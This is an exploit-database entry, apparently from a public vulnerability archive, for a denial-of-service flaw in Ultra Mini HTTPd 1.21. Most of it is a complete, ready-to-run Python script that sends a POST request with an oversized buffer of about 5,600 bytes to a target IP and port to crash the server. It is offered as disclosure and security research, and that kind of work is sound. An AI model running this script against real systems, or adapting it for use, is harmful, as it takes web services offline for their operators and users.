Ultra Mini HTTPd 1.21 - POST - Denial of Service (DoS)

2024.10.16
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: 119

# Exploit Title: Ultra Mini HTTPd 1.21 - POST - Denial of Service (DoS) # Discovery by: Fagner Lima - Aka r3ng4f # Discovery Date: 2024-1016 # Vendor Homepage: https://acme.com/ # Software Link: https://acme.com/ # Notification vendor: Yes reported # Tested Version: Ultra Mini HTTPd 1.21 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) import socket import sys import os # Clear the console depending on the system def clear_console(): if os.name == 'nt': # For Windows os.system('cls') else: # For Mac and Linux os.system('clear') # Intro text def intro(): print("***************************************************") print("* Ultra Mini HTTPd 1.21 - Denial of Service *") print("* *") print("* Coded by Fagner Lima - Aka r3ng4f *") print("* *") print("* e-mail: fagner.alex@gmail.com *") print("* *") print("***************************************************") # Main function to handle IP and port arguments def main(): if len(sys.argv) != 3: print("\nUsage: {} <ip> <port>".format(sys.argv[0])) sys.exit(-1) ip = sys.argv[1] port = int(sys.argv[2]) return ip, port # Function to exploit the vulnerability def exploit(ip, port): print("[+] Exploiting...") buffer = "\x41" * 192 payload = 'A' * 5438 + buffer try: # Connect to the server with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((ip, port)) request = f"POST / {payload} HTTP/1.1\r\nHost:{ip}\r\n\r\n" s.send(request.encode()) print("[+] Exploit sent successfully!") except Exception as e: print(f"[-] Failed to connect: {e}") # Run the exploit if __name__ == "__main__": clear_console() intro() ip, port = main() exploit(ip, port)


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top